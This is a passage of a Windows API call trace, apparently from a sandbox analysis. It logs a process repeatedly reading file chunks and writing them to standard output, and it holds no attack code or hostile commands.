lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.709] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.709] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.709] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.709] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.709] GetFileType (hFile=0x50) returned 0x1 [0207.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.709] GetFileType (hFile=0x50) returned 0x1 [0207.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.709] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.709] GetFileType (hFile=0x50) returned 0x1 [0207.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.709] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.710] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.710] GetFileType (hFile=0x50) returned 0x1 [0207.710] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.710] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.710] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.710] GetFileType (hFile=0x50) returned 0x1 [0207.710] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.710] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.710] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.710] GetFileType (hFile=0x50) returned 0x1 [0207.710] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.710] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.710] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.710] GetFileType (hFile=0x50) returned 0x1 [0207.710] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.710] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.710] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.710] GetFileType (hFile=0x50) returned 0x1 [0207.710] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.710] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.710] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.710] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.710] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.710] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.710] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.710] GetFileType (hFile=0x50) returned 0x1 [0207.710] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.710] GetFileType (hFile=0x50) returned 0x1 [0207.710] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.710] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.710] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.711] GetFileType (hFile=0x50) returned 0x1 [0207.711] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.711] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.711] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.711] GetFileType (hFile=0x50) returned 0x1 [0207.711] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.711] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.711] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.711] GetFileType (hFile=0x50) returned 0x1 [0207.711] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.711] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.711] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.711] GetFileType (hFile=0x50) returned 0x1 [0207.711] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.711] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.711] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.711] GetFileType (hFile=0x50) returned 0x1 [0207.711] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.711] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.711] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.711] GetFileType (hFile=0x50) returned 0x1 [0207.711] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.711] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.711] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.711] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.711] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.711] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.711] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.711] GetFileType (hFile=0x50) returned 0x1 [0207.711] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.711] GetFileType (hFile=0x50) returned 0x1 [0207.712] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.712] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.712] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.712] GetFileType (hFile=0x50) returned 0x1 [0207.712] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.712] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.712] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.712] GetFileType (hFile=0x50) returned 0x1 [0207.712] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.712] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.712] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.712] GetFileType (hFile=0x50) returned 0x1 [0207.712] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.712] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.712] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.712] GetFileType (hFile=0x50) returned 0x1 [0207.712] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.712] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.712] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.712] GetFileType (hFile=0x50) returned 0x1 [0207.712] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.712] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.712] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.712] GetFileType (hFile=0x50) returned 0x1 [0207.712] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.712] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.712] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.712] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.712] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.712] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.713] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.713] GetFileType (hFile=0x50) returned 0x1 [0207.713] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.713] GetFileType (hFile=0x50) returned 0x1 [0207.713] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.713] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.713] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.713] GetFileType (hFile=0x50) returned 0x1 [0207.713] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.713] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.713] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.713] GetFileType (hFile=0x50) returned 0x1 [0207.713] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.713] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.713] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.713] GetFileType (hFile=0x50) returned 0x1 [0207.713] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.713] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.713] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.713] GetFileType (hFile=0x50) returned 0x1 [0207.713] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.713] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.713] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.713] GetFileType (hFile=0x50) returned 0x1 [0207.713] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.713] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.713] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.713] GetFileType (hFile=0x50) returned 0x1 [0207.713] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.713] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.713] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.714] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.714] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.714] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.714] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.714] GetFileType (hFile=0x50) returned 0x1 [0207.714] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.714] GetFileType (hFile=0x50) returned 0x1 [0207.714] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.714] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.714] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.714] GetFileType (hFile=0x50) returned 0x1 [0207.714] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.714] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.714] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.714] GetFileType (hFile=0x50) returned 0x1 [0207.714] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.714] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.714] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.714] GetFileType (hFile=0x50) returned 0x1 [0207.714] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.714] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.714] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.714] GetFileType (hFile=0x50) returned 0x1 [0207.714] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.714] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.714] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.714] GetFileType (hFile=0x50) returned 0x1 [0207.714] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.714] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.714] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.714] GetFileType (hFile=0x50) returned 0x1 [0207.715] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.715] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.715] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.715] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.715] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.715] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.715] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.715] GetFileType (hFile=0x50) returned 0x1 [0207.715] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.715] GetFileType (hFile=0x50) returned 0x1 [0207.715] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.715] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.715] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.715] GetFileType (hFile=0x50) returned 0x1 [0207.715] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.715] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.715] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.715] GetFileType (hFile=0x50) returned 0x1 [0207.715] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.715] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.715] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.715] GetFileType (hFile=0x50) returned 0x1 [0207.715] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.715] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.715] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.715] GetFileType (hFile=0x50) returned 0x1 [0207.715] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.716] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.716] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.716] GetFileType (hFile=0x50) returned 0x1 [0207.716] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.716] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.716] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.716] GetFileType (hFile=0x50) returned 0x1 [0207.716] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.716] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.716] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.716] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.716] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.716] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.716] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.716] GetFileType (hFile=0x50) returned 0x1 [0207.716] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.716] GetFileType (hFile=0x50) returned 0x1 [0207.716] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.716] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.716] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.716] GetFileType (hFile=0x50) returned 0x1 [0207.716] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.716] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.716] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.716] GetFileType (hFile=0x50) returned 0x1 [0207.716] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.716] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.716] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.716] GetFileType (hFile=0x50) returned 0x1 [0207.716] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.716] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.717] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.717] GetFileType (hFile=0x50) returned 0x1 [0207.717] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.717] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.717] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.717] GetFileType (hFile=0x50) returned 0x1 [0207.717] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.717] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.717] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.717] GetFileType (hFile=0x50) returned 0x1 [0207.717] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.717] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.717] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.717] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.717] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.717] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.717] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.717] GetFileType (hFile=0x50) returned 0x1 [0207.717] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.717] GetFileType (hFile=0x50) returned 0x1 [0207.717] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.717] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.717] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.717] GetFileType (hFile=0x50) returned 0x1 [0207.717] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.717] WriteFile (in: 